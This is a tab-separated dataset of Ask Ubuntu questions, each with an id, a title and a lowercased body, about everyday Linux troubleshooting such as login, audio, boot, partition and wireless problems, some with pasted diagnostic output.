400762	ca n't stay logged in on google chrome	i 'm using google chrome 31.0.1650.63 on ubuntu 13.04 ( raring ) . it was all working fine but since last day whenever i restart my computer , i 'm automatically logged off all the sites ( such as stack exchange sites , facebook , google etc. ) . i followed the steps given on this answer to enable logging on google chrome , but i could n't find anything suspicious in the logs . i 've checked the content settings in google chrome , and it is set to `` allow local data to be set ( recommended ) '' . any ideas why this is happening ?
400765	ca n't open .exe file on cd because it 's read only	so i have this software cd for my canon mx420 printer that i 've been trying to install onto my computer . however , when i run the .exe setup file , it says i need to run the program as an administrator . then , after adding the open-as-administrator nautilus script , i ca n't change the .exe to open as an executable because it says the file system is read-only . i ca n't access my printer without this software cd , and i 'm not sure how else i could run the setup to get the necessary files .
400767	asus zenbook ux32vd microphone noise	using 64-bit ubuntu 12.04 lts with all current updates and latest stable kernel ( 3.12.6 ) . also applied advices from https : //help.ubuntu.com/community/asuszenbookprime - there is writing , that internal mic works fine but mine does not . but microphone generates noise regardless of : external mic : combo jack ( headphones output + mic input ) . type the following code in a terminal window and hit 'enter ' : echo options snd-hda-intel model=laptop-dmic | sudo tee -a /etc/modprobe.d/alsa-base.conf then restart alsa : sudo alsa force-reload ... but i need to get internal mic to work without strong background noise ...
400771	problem with banshee media player	i 'm running ubuntu 13.10 on a toshiba satellite c660d . why ca n't i open cd 's with banshee media player , from the opening dialogue box that appears when i insert a cd . it defaults to brasero or rhythm box , and when i open sound settings there 's a red no entry sign next to banshee . i installed banshee and all plugin options using synaptic . everything else works fine . i can play and import from inside banshee but this problem is a little annoying . if anyone can help i would appreciate it
400774	poor gaming performance in ubuntu	i 'm seeing a problem in ubuntu 12.04 and later . when i boot into a video game like half life 2 , i get massive lag ( fps drops ) and my cpu runs at 100 % . my system even lags for games like supertuxcart but it has great performance on the desktop , playing videos in 1080p etc . when i go into `` big picture '' mode ( a feature that allows me to play my games on my tv ) on steam , it loads in the lowest possible resolution and when i try to change it , steam warns me that my display device only has 268 mb of dedicated gpu memory . my system is a hp pavilion 2248-g6 with an amd a4-4300m graphics card , running catalyst 13.11 beta drivers .
400779	read/write f2fs file system	currently i 'm using 12.04.3 with kernel 3.5.0-45 and would like to read/write a sd card with f2fs filesystem . it seems that i ca n't install f2fs-tools in 12.04 precise .
400783	how to change the color of the empty purple screen which appears before splash screen ?	i have changed the purple color of splash screen to black and i also would like to change the color of the screen that appears before the splash screen . how can i do it ? btw , how is this screen called ?
400793	some image files wo n't be displayed by apache , returns 500 error ( file ownership/permissions )	i just copied all my files from one ubuntu server to another , and everything works fine , except that apache returns a `` error 500 - internal server error ! '' on image files that on the old server was uploaded by the user himself through a php script . i log in to the server through the terminal with ssh as root . checking the file permissions using the `` ls -l '' command through terminal shows the following : example of a file that apache does display correctly : -rw-r -- r -- 1 root root 41k jan 6 03:27 layout1.png example of a file that returns the 500 error : drwxrwxrwx 3 root root 4.0k jan 6 03:41 516191110e5e1 i did try `` chmod 644 -r * '' on the files after a tip from stackoverflow , but then the apache error changes to `` 403 forbidden '' . any ideas what caused it , and how to solve the problem ?
400799	how to create a search folder for accessing files across multiple folders ?	is there a way to create a `` search folder '' like thundebird and some operating systems have ? here 's my scenario i am trying to fix : i run data recovery on hard drives and some of the files come through fine while others are corrupted . the easiest way to sort through them ( particularly images ) is to open their containing folders and see which ones auto-preview correctly . the problem is that there may be hundreds of folders and while i could just do a `` find all *.jpg and move them to folder x '' , some of the files have the same names which requires renaming them and losing information about their original location . ideally , i could search for *.jpg and have a folder where all the *.jpgs it found are hardlinked to the originals . that way i can auto-preview them in nautilus or the program of my choice . is there a program that does this or a way to do it in gnome ? hopefully i 'm not the only person who needs this feature . thanks !
400806	configuring pxe in ubuntu to install windows xp	i am using ubuntu server with windows xp clients connected over lan . i want to configure pxe so that i can install windows through pxe boot itself . i am a beginner in linux field . so explain the procedure in a brief manner , so that i can implement it successfully .
400807	is there an easy command line command to check disk space ?	`` command line '' commands are very helpful . is there a command to display the memory of each partition of my drives.. ?
400808	remove ubuntu one music app from dash	is there any way for me to remove the ubuntu one music app in ubuntu 13.10 ? it 's really annoying because i 'm never going to use it and it always appears when i try do an app search in the dash . i had a similar problem the with amazon app and i was able to find the following command to remove it , which worked perfectly : sudo rm -rf /usr/share/applications/ubuntu-amazon-default.desktop i imagine i can do the exact same thing by substituting ubuntu-amazon-default.desktop with whatever the path is to ubuntu one music . however , i have no idea what that would be .
400812	difficulty in using iwconfig , can i get full command to start a virtuall wireless network ?	i came to know that iwconfig does the work for sharing the virtual wireless network but i have difficulty in using the command . i have no idea how to use this command . i felt harder even after reading the manual . so could someone provide the command through which i can easily start the virtual wireless network for sharing it .
400813	audacity is n't playing any sound and it makes 30 tracks instead of one	when i play anything in audacity there is no sound . i uninstalled it but it did n't work . before i installed it through the ubuntu software center , so i reinstalled it this time using a command . still no change . also every time i record it makes 30 tracks instead of one .
400814	how to check the software version of each ubuntu release ?	could we check the software versions in each ubuntu release without install the os ? and what 's the software versions in next release ?
400816	trouble getting my bluetooth headset as audio output ubuntu 13.10	i just bought a bluetooth headset . achieve pair and connect to the computer with blueman . the problem gives me the time to change the sound settings , first i do not get the headphones to select as an output option but with the command : pulseaudio-k , succeeds in making it to appear , but when you select it will not let me save configuration simply does nothing , as he had not selected headphones and speakers selected again . pacmd list : 1 sink ( s ) available . *** index : 0 name : < alsa_output.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 9959 volume : 0 : 52 % 1 : 52 % 0 : -17,04 db 1 : -17,04 db balance 0,00 base volume : 100 % 0,00 db volume steps : 65537 muted : no current latency : 0,00 ms max request : 0 kib max rewind : 0 kib monitor source : 0 sample spec : s16le 2ch 44100hz channel map : front-left , front-right estéreo used by : 0 linked by : 0 configured latency : 0,00 ms ; range is 0,50 .. 371,52 ms card : 0 < alsa_card.pci-0000_00_1b.0 > module : 5 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` 92hd99bxx analog '' alsa.id = `` 92hd99bxx analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel pch '' alsa.long_card_name = `` hda intel pch at 0xc2700000 irq 51 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 1c20 '' device.product.name = `` 6 series/c200 series chipset family high definition audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` estéreo analógico '' device.description = `` audio interno estéreo analógico '' alsa.mixer_name = `` intel cougarpoint hdmi '' alsa.components = `` hda:111d76e5,103c17f8,00100102 hda:80862805,80860101,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-output-speaker : altavoces ( priority 10000 , latency offset 0 usec , available : unknown ) properties : device.icon_name = `` audio-speakers '' analog-output-headphones : auriculares analógicos ( priority 9000 , latency offset 0 usec , available : no ) properties : device.icon_name = `` audio-headphones '' active port : < analog-output-speaker > 2 source ( s ) available . index : 0 name : < alsa_output.pci-0000_00_1b.0.analog-stereo.monitor > driver : < module-alsa-card.c > flags : decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 1950 volume : 0 : 100 % 1 : 100 % 0 : 0,00 db 1 : 0,00 db balance 0,00 base volume : 100 % 0,00 db volume steps : 65537 muted : no current latency : 0,00 ms max rewind : 0 kib sample spec : s16le 2ch 44100hz channel map : front-left , front-right estéreo used by : 0 linked by : 0 configured latency : 0,00 ms ; range is 0,50 .. 371,52 ms monitor_of : 0 card : 0 < alsa_card.pci-0000_00_1b.0 > module : 5 properties : device.description = `` monitor of audio interno estéreo analógico '' device.class = `` monitor '' alsa.card = `` 0 '' alsa.card_name = `` hda intel pch '' alsa.long_card_name = `` hda intel pch at 0xc2700000 irq 51 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 1c20 '' device.product.name = `` 6 series/c200 series chipset family high definition audio controller '' device.form_factor = `` internal '' device.string = `` 0 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' * index : 1 name : < alsa_input.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : running suspend cause : priority : 9959 volume : 0 : 24 % 1 : 24 % 0 : -36,74 db 1 : -36,74 db balance 0,00 base volume : 10 % -60,00 db volume steps : 65537 muted : no current latency : 1,01 ms max rewind : 0 kib sample spec : s16le 2ch 44100hz channel map : front-left , front-right estéreo used by : 1 linked by : 1 configured latency : 20,00 ms ; range is 0,50 .. 371,52 ms card : 0 < alsa_card.pci-0000_00_1b.0 > module : 5 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` 92hd99bxx analog '' alsa.id = `` 92hd99bxx analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel pch '' alsa.long_card_name = `` hda intel pch at 0xc2700000 irq 51 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 1c20 '' device.product.name = `` 6 series/c200 series chipset family high definition audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` estéreo analógico '' device.description = `` audio interno estéreo analógico '' alsa.mixer_name = `` intel cougarpoint hdmi '' alsa.components = `` hda:111d76e5,103c17f8,00100102 hda:80862805,80860101,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-input-microphone-internal : micrófono interno ( priority 8900 , latency offset 0 usec , available : unknown ) properties : device.icon_name = `` audio-input-microphone '' analog-input-microphone : micrófono ( priority 8700 , latency offset 0 usec , available : no ) properties : device.icon_name = `` audio-input-microphone '' active port : < analog-input-microphone-internal > 7 client ( s ) logged in . index : 0 driver : < module-systemd-login.c > owner module : 17 properties : application.name = `` login session c2 '' systemd-login.session = `` c2 '' index : 1 driver : < protocol-native.c > owner module : 10 properties : application.name = `` ubuntu audio settings '' native-protocol.peer = `` unix socket client '' native-protocol.version = `` 28 '' application.id = `` com.canonical.settings.sound '' application.icon_name = `` multimedia-volume-control '' application.version = `` 0.1 '' application.process.id = `` 2364 '' application.process.user = `` steven '' application.process.host = `` linux-hp '' application.process.binary = `` indicator-sound-service '' application.language = `` es_gt.utf-8 '' window.x11.display = `` :0 '' application.process.machine_id = `` 6bf66e30c3f3f846367c005c5178879b '' application.process.session_id = `` c2 '' index : 2 driver : < protocol-native.c > owner module : 10 properties : application.name = `` gnome volume control dialog '' native-protocol.peer = `` unix socket client '' native-protocol.version = `` 28 '' application.id = `` org.gnome.volumecontrol '' application.icon_name = `` multimedia-volume-control '' application.version = `` 3.6.3 '' application.process.id = `` 5906 '' application.process.user = `` steven '' application.process.host = `` linux-hp '' application.process.binary = `` gnome-control-center '' application.language = `` es_gt.utf-8 '' window.x11.display = `` :0 '' application.process.machine_id = `` 6bf66e30c3f3f846367c005c5178879b '' application.process.session_id = `` c2 '' index : 3 driver : < protocol-native.c > owner module : 10 properties : application.name = `` blueman '' native-protocol.peer = `` unix socket client '' native-protocol.version = `` 28 '' application.process.id = `` 4822 '' application.process.user = `` steven '' application.process.host = `` linux-hp '' application.process.binary = `` python2.7 '' application.language = `` es_gt.utf-8 '' window.x11.display = `` :0 '' application.process.machine_id = `` 6bf66e30c3f3f846367c005c5178879b '' application.process.session_id = `` c2 '' application.icon_name = `` /usr/share/pixmaps/python2.7.xpm '' index : 4 driver : < protocol-native.c > owner module : 10 properties : application.name = `` blueman '' native-protocol.peer = `` unix socket client '' native-protocol.version = `` 28 '' application.process.id = `` 2459 '' application.process.user = `` steven '' application.process.host = `` linux-hp '' application.process.binary = `` python2.7 '' application.language = `` es_gt.utf-8 '' window.x11.display = `` :0 '' application.process.machine_id = `` 6bf66e30c3f3f846367c005c5178879b '' application.process.session_id = `` c2 '' application.icon_name = `` /usr/share/pixmaps/python2.7.xpm '' index : 5 driver : < protocol-native.c > owner module : 10 properties : application.name = `` gnome volume control media keys '' native-protocol.peer = `` unix socket client '' native-protocol.version = `` 28 '' application.id = `` org.gnome.volumecontrol '' application.icon_name = `` multimedia-volume-control '' application.version = `` 3.8.5 '' application.process.id = `` 2115 '' application.process.user = `` steven '' application.process.host = `` linux-hp '' application.process.binary = `` gnome-settings-daemon '' application.language = `` es_gt.utf-8 '' window.x11.display = `` :0 '' application.process.machine_id = `` 6bf66e30c3f3f846367c005c5178879b '' application.process.session_id = `` c2 '' index : 9 driver : < cli.c > owner module : 23 properties : application.name = `` unix socket client '' 2 card ( s ) available . index : 0 name : < alsa_card.pci-0000_00_1b.0 > driver : < module-alsa-card.c > owner module : 5 properties : alsa.card = `` 0 '' alsa.card_name = `` hda intel pch '' alsa.long_card_name = `` hda intel pch at 0xc2700000 irq 51 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 1c20 '' device.product.name = `` 6 series/c200 series chipset family high definition audio controller '' device.form_factor = `` internal '' device.string = `` 0 '' device.description = `` audio interno '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' profiles : input : analog-stereo : estéreo analógico entrada ( priority 60 , available : unknown ) output : analog-stereo : estéreo analógico salida ( priority 6000 , available : unknown ) output : analog-stereo+input : analog-stereo : estéreo analógico dúplex ( priority 6060 , available : unknown ) output : hdmi-stereo : digital stereo ( hdmi ) salida ( priority 5400 , available : unknown ) output : hdmi-stereo+input : analog-stereo : digital stereo ( hdmi ) salida + estéreo analógico entrada ( priority 5460 , available : unknown ) output : hdmi-surround : digital surround 5.1 ( hdmi ) salida ( priority 300 , available : unknown ) output : hdmi-surround+input : analog-stereo : digital surround 5.1 ( hdmi ) salida + estéreo analógico entrada ( priority 360 , available : unknown ) off : apagado ( priority 0 , available : unknown ) active profile : < output : analog-stereo+input : analog-stereo > sinks : alsa_output.pci-0000_00_1b.0.analog-stereo/ # 0 : audio interno estéreo analógico sources : alsa_output.pci-0000_00_1b.0.analog-stereo.monitor/ # 0 : monitor of audio interno estéreo analógico alsa_input.pci-0000_00_1b.0.analog-stereo/ # 1 : audio interno estéreo analógico ports : analog-input-microphone-internal : micrófono interno ( priority 8900 , latency offset 0 usec , available : unknown ) properties : device.icon_name = `` audio-input-microphone '' analog-input-microphone : micrófono ( priority 8700 , latency offset 0 usec , available : no ) properties : device.icon_name = `` audio-input-microphone '' analog-output-speaker : altavoces ( priority 10000 , latency offset 0 usec , available : unknown ) properties : device.icon_name = `` audio-speakers '' analog-output-headphones : auriculares analógicos ( priority 9000 , latency offset 0 usec , available : no ) properties : device.icon_name = `` audio-headphones '' hdmi-output-0 : hdmi / displayport ( priority 5900 , latency offset 0 usec , available : no ) properties : device.icon_name = `` video-display '' index : 1 name : < bluez_card.00_13_09_00_1b_ca > driver : < module-bluetooth-device.c > owner module : 22 properties : device.description = `` swage-rb '' device.string = `` 00:13:09:00:1b : ca '' device.api = `` bluez '' device.class = `` sound '' device.bus = `` bluetooth '' device.form_factor = `` headset '' bluez.path = `` /org/bluez/502/hci0/dev_00_13_09_00_1b_ca '' bluez.class = `` 0x240404 '' bluez.name = `` swage-rb '' device.icon_name = `` audio-headset-bluetooth '' device.intended_roles = `` phone '' profiles : hsp : telefonía duplex ( hsp/hfp ) ( priority 20 , available : unknown ) a2dp : reproducción de alta fidelidad ( a2dp ) ( priority 10 , available : unknown ) off : apagado ( priority 0 , available : yes ) active profile : < off > ports : headset-output : auriculares ( priority 0 , latency offset 0 usec , available : unknown ) properties : headset-input : auriculares ( priority 0 , latency offset 0 usec , available : unknown ) properties : 0 sink input ( s ) available . 1 source outputs ( s ) available . index : 0 driver : < protocol-native.c > flags : dont_move state : running source : 1 < alsa_input.pci-0000_00_1b.0.analog-stereo > volume : 0 : 100 % 0 : 0,00 db balance 0,00 muted : no current latency : 0,00 ms requested latency : 20,00 ms sample spec : float32le 1ch 25hz channel map : mono mono resample method : peaks owner module : 10 client : 2 < gnome volume control dialog > properties : application.id = `` org.gnome.volumecontrol '' media.name = `` detección de picos '' application.name = `` gnome volume control dialog '' native-protocol.peer = `` unix socket client '' native-protocol.version = `` 28 '' application.icon_name = `` multimedia-volume-control '' application.version = `` 3.6.3 '' application.process.id = `` 5906 '' application.process.user = `` steven '' application.process.host = `` linux-hp '' application.process.binary = `` gnome-control-center '' application.language = `` es_gt.utf-8 '' window.x11.display = `` :0 '' application.process.machine_id = `` 6bf66e30c3f3f846367c005c5178879b '' application.process.session_id = `` c2 '' module-stream-restore.id = `` source-output-by-application-id : org.gnome.volumecontrol '' 0 cache entrie ( s ) available . ** /etc/pulse/default.pa : # ! /usr/bin/pulseaudio -nf # # this file is part of pulseaudio . # # pulseaudio is free software ; you can redistribute it and/or modify it # under the terms of the gnu lesser general public license as published by # the free software foundation ; either version 2 of the license , or # ( at your option ) any later version . # # pulseaudio is distributed in the hope that it will be useful , but # without any warranty ; without even the implied warranty of # merchantability or fitness for a particular purpose . see the gnu # general public license for more details . # # you should have received a copy of the gnu lesser general public license # along with pulseaudio ; if not , write to the free software foundation , # inc. , 59 temple place , suite 330 , boston , ma 02111-1307 usa . # this startup script is used only if pulseaudio is started per-user # ( i.e . not in system mode ) .nofail # # # load something into the sample cache # load-sample-lazy x11-bell /usr/share/sounds/gtk-events/activate.wav # load-sample-lazy pulse-hotplug /usr/share/sounds/startup3.wav # load-sample-lazy pulse-coldplug /usr/share/sounds/startup3.wav # load-sample-lazy pulse-access /usr/share/sounds/generic.wav .fail # # # automatically restore the volume of streams and devices load-module module-device-restore load-module module-stream-restore load-module module-card-restore # # # automatically augment property information from .desktop files # # # stored in /usr/share/application load-module module-augment-properties # # # should be after module-*-restore but before module-*-detect load-module module-switch-on-port-available # # # load audio drivers statically # # # ( it 's probably better to not load these drivers manually , but instead # # # use module-udev-detect -- see below -- for doing this automatically ) # load-module module-alsa-sink # load-module module-alsa-source device=hw:1,0 # load-module module-oss device= '' /dev/dsp '' sink_name=output source_name=input # load-module module-oss-mmap device= '' /dev/dsp '' sink_name=output source_name=input # load-module module-null-sink # load-module module-pipe-sink # # # automatically load driver modules depending on the hardware available .ifexists module-udev-detect.so load-module module-udev-detect .else # # # use the static hardware detection module ( for systems that lack udev support ) load-module module-detect .endif .ifexists module-android-audio-hal.so load-module module-android-audio-hal .endif # # # automatically connect sink and source if jack server is present .ifexists module-jackdbus-detect.so .nofail load-module module-jackdbus-detect channels=2 .fail .endif # # # automatically load driver modules for bluetooth hardware .ifexists module-bluetooth-policy.so load-module module-bluetooth-policy .endif .ifexists module-bluetooth-discover.so load-module module-bluetooth-discover .endif # # # load several protocols .ifexists module-esound-protocol-unix.so load-module module-esound-protocol-unix .endif load-module module-native-protocol-unix # # # network access ( may be configured with paprefs , so leave this commented # # # here if you plan to use paprefs ) # load-module module-esound-protocol-tcp # load-module module-native-protocol-tcp # load-module module-zeroconf-publish # # # load the rtp receiver module ( also configured via paprefs , see above ) # load-module module-rtp-recv # # # load the rtp sender module ( also configured via paprefs , see above ) # load-module module-null-sink sink_name=rtp format=s16be channels=2 rate=44100 sink_properties= '' device.description='rtp multicast sink ' '' # load-module module-rtp-send source=rtp.monitor # # # load additional modules from gconf settings . this can be configured with the paprefs tool . # # # please keep in mind that the modules configured by paprefs might conflict with manually # # # loaded modules . .ifexists module-gconf.so .nofail load-module module-gconf .fail .endif # # # automatically restore the default sink/source when changed by the user # # # during runtime # # # note : this should be loaded as early as possible so that subsequent modules # # # that look up the default sink/source get the right value load-module module-default-device-restore # # # automatically move streams to the default sink if the sink they are # # # connected to dies , similar for sources load-module module-rescue-streams # # # make sure we always have a sink around , even if it is a null sink . load-module module-always-sink # # # honour intended role device property load-module module-intended-roles # # # automatically suspend sinks/sources that become idle for too long load-module module-suspend-on-idle # # # if autoexit on idle is enabled we want to make sure we only quit # # # when no local session needs us anymore . .ifexists module-console-kit.so load-module module-console-kit .endif .ifexists module-systemd-login.so load-module module-systemd-login .endif # # # enable positioned event sounds load-module module-position-event-sounds # # # cork music/video streams when a phone stream is active # load-module module-role-cork # # # modules to allow autoloading of filters ( such as echo cancellation ) # # # on demand . module-filter-heuristics tries to determine what filters # # # make sense , and module-filter-apply does the heavy-lifting of # # # loading modules and rerouting streams . load-module module-filter-heuristics load-module module-filter-apply # x11 modules should not be started from default.pa so that one daemon # can be shared by multiple sessions . # # # load x11 bell module # load-module module-x11-bell sample=bell-windowing-system # # # register ourselves in the x11 session manager # load-module module-x11-xsmp # # # publish connection data in the x11 root window # .ifexists module-x11-publish.so # .nofail # load-module module-x11-publish # .fail # .endif # # # make some devices default # set-default-sink output # set-default-source input # nuevo load-module module-switch-on-connect bluez-test-audio : usage : /usr/bin/bluez-test-audio < command > connect < bdaddr > disconnect < bdaddr >
400817	how to install ubuntu 13.04 or later on dell inspiron 17 and remove windows 8	for my personal work purpose , i bought dell inspiron 17 and at that time i did not know that i will not be able to install ubuntu on my laptop . please share how can i uninstall windows 8 and install ubuntu os . thanks !
400818	how to install vmware player on 32-bit 13.10 without 64-bit virtualisation	i 'm having a nightmare of a time trying to install vmware player on my 32-bit 13.10 . apparently my cpu does n't have 64-bit virtualisation support ( i enabled cpu virtualisation in the bios but no joy ) . apparently something changed in a certain version of vmware and in my scenario i 'm stuck . i am trying to find out if i can get back to the last version of vmware that will support my hardware . all versions of vmware i 've tried give me `` one or more of your processors does not have the necessary 64bit extensions to run vmware virtual machines . '' can anyone help ? if you 're about to ask , it does need to be vmware and not virtual box or other alternatives .
400820	creating dsl connection from terminal	i am using ubuntu 12.04 . i use dsl connection and i configured it using the most common approach , using the network manager in the upper panel . but recently i am facing problem . though my internet connection is ok and i can connect it using windows i ca n't connect it all the time using ubuntu . sometimes it works and sometime it is n't . if connection is dropped while using , sometimes i ca n't connect it again unless restarting the pc . so i thought of configuring it raw using terminal . how can i do it ?
400821	i 've installed ubuntu 13.04 ( using something else ) and now i can not boot windows 8	hello everyone i 'm new to ubuntu so i probably messed something up . when i installed ubuntu on my windows 8 hp laptop it did not give me the option to install ubuntu alongside windows so i installed it using the something else option . i think i may have messed up during the partitioning but i 'm not sure . when i turned on the pc it at first directly booted up ubuntu without showing me the grub screen , eventually i was able to get the grub screen to appear but it does not recognize windows . i ran boot repair and i was given this url : http : //paste.ubuntu.com/6701216/ . boot-repair did not solve my problem . thanks for any help guys i really want to be able to run windows alongside ubuntu and access the files that are in windows .
400822	network connectivity problem in 12.04lts installed on vmware 10.0	i installed ubuntu 12.04lts on virtual machines 10.0 . my host operating system is windows 8.1 . my laptop hardware configuration is intel 4th generation i7 with 8gb ram with an additional 2gb nvidia graphic card . i have an internet connection with 20mbps which is working with all other operating systems which i already using in virtual machines 10.0 except with this newly installed ubuntu 12.04lts . in virtual machine settings the network adopter is set to host-only . can any one help me in resolving this problem ? thanks for your help in advance .
400823	matrox m9128 driver install	matrox drivers will not install in ubuntu 12.04 matrox does not offer help . anyone have this issue , solutions ?
400824	how to use backspace in terminal in ubuntu 13.10.. ?	i am using ubuntu 13.10.i cant able to use backspace in terminal . while using backspace it just passed through the letters.please help me ...
400825	how to remove temp installation packages	not very well versed with ubuntu . i got this msg when i tried to get some updates : the upgrade needs a total of 31.9 m free space on disk '/boot ' . please free at least an additional 27.6 m of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . when im trying to run 'sudo apt-get clean ' , it says command not found . how do i remove temp packages ?
400826	replace os to expand ubuntu partition	i have a question ( duh , but anyways ) . on my computer , i have 3 oses installed ; windows 7 , ubuntu 12.10 and crunchbang 11 ( based on debian ) . i 've been having some trouble with crunchbang , and frankly , i 'm done messing around with distributions that do n't work properly . originally , i had installed zorin os 6 ( based off ubuntu 12.04 lts ) alongside my windows installation , with 2 gb swap . i later installed ubuntu 12.10 alongside all three of those , on a 15 gb partition , for testing purposes . as time went on , i started liking ubuntu 12.10 more and more , but my disk space was limiting me . the way ubuntu installed itself was kind of weird . instead of tacking itself on the end of the hard drive , it was put in the middle , right in between windows and zorin os . recently , i replaced zorin os with crunchbang , having thought that it was a great os based on my experiences with the live usb , but i 've had a lot of problems with it freezing and crashing a lot , and it 's getting a bit old having to reboot multiple times just to get crunchbang to work . so what i want to do is expand my ubuntu installation into crunchbang 's partition , essentially erasing crunchbang and merging the two partitions . can i do this without reinstalling ubuntu or without a lot of rebooting , and would it be as simple as removing the crunchbang partition and just expanding ubuntu ? here 's how my hard drive is laid out : /dev/sda1 ( diagnostics , ntfs , 15.00 gb ) is windows recovery . /dev/sda2 ( bootable , ntfs , 100 mb ) is grub ( i think ? ) . /dev/sda3 ( ntfs , 198.56 gb ) is windows 7 . /dev/sda4 ( extended , covering a total of 84.43 gb ) is the parent of the following linux partitions : /dev/sda7 ( ext4 , 14.48 gb ) is ubuntu . /dev/sda5 ( ext4 , 68.22 gb ) is crunchbang . /dev/sda6 ( linux-swap , 1.73 gb ) is swap space . so to make my question a little more technical , can i just erase sda5 and resize sda7 to take up the space sda5 previously occupied ? also , grub is currently controlled by crunchbang . what would be the commands to transfer control of grub back over to ubuntu ? thanks in advance , sil
400828	how to remap an unknown key	i 'm using a standard qwerty keyboard not that really matters , just that i just a few extra keys i do n't use . ( menu , winleft , winright ) i want to map them to the three extra keys on an oadg 109 only i do n't know the `` names '' of the three keys ( the one to the left of the space bar and the two on the right , before the corresponding alt keys ) i know the command to remap is xmodmap -e `` keysym menu = [ name/function of new mapping ] '' is there a way for my to get this information or does someone know i tried looking online already http : //upload.wikimedia.org/wikipedia/commons/b/bc/kb_japanese.svg
400829	how to get wlan tranmission statistics ?	how to get the actual number of transmission by the hardware of wlan0 ? when a device communicates with other over wireless network , the actual data transfer and the actual wireless transmission on the hardware are different . how to get the statistics of hardware transmissions ?
400830	remove startup password when default login is command line	when i boot up my computer , it goes straight to the command line . i modified /etc/default/grub file from grub_cmdline_linux_default= '' quiet splash '' to quiet splash text . can someone please explain how to set auto-login when i boot into the command line ? all i have found is sudo visudo which completely removes the sudo password which is not what i want . setting auto login from /etc/lightdm/lightdm.conf is auto login for the gui only . thank you in advance .
400833	ubuntu-windows 8 dual boot problem	i have been using ubuntu 12.04 and windows 8 dual boot for about 6 months . recently i installed all available ubuntu updates ( around 300 mb ) and also ubuntu one . after that i am not able to boot up properly . it says `` no boot found press any key to reboot '' . so i used boot-repair but it did not fix anything . the url received after running boot-repair : http : //paste.ubuntu.com/6701107/ http : //paste.ubuntu.com/6701212/ ( i ran it twice . both times from a ubuntu live usb ) then i put in my windows 8 recovery disc . i just put it in and took it out ( i did not use it ) . now it is showing the dual boot menu and i can easily boot into windows but if i boot into ubuntu then the same problem ( no boot found ) will come again .
400834	/tmp is yet not ready or not present	after pressing power bottom , when ubuntu shows the login screen it also shows this error the drive for /tmp is yet not ready or not present . why is this displayed ? and how to solve this error ?
400840	mounting error after upgrade from 12.10 to 13.04	i have upgraded from ubuntu 12.10 to 13.04 . after rebooting my laptop ubuntu appears and then this message is displayed : general error mounting file system . a maintenance shell will now be started . control -d will terminate this shell and reboot the system . root @ myname-laptop : ~
400844	ca n't establish wireless connection in ubuntu 12.04.3	i have ubuntu 12.04.3 lts running on dell inspiron 15r system . it does not find wireless connections at all . i tried to take help from numerous number of similar threads discussed on this forum ( no wireless with intel centrino advanced-n 7260 ) , but no luck . kernel information is as below : debkumar @ debkumarubuntu : ~ $ uname -a linux debkumarubuntu 3.8.0-35-generic # 50~precise1-ubuntu smp wed dec 4 17:25:51 utc 2013 x86_64 x86_64 x86_64 gnu/linux lshw : debkumar @ debkumarubuntu : ~ $ sudo lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 07 serial : 74:86:7a:5d:3d:28 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8106e-1_0.0.1 06/29/12 ip=192.168.1.163 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:60 ioport:3000 ( size=256 ) memory : b0600000-b0600fff memory : b0400000-b0403fff *-network unclaimed description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info 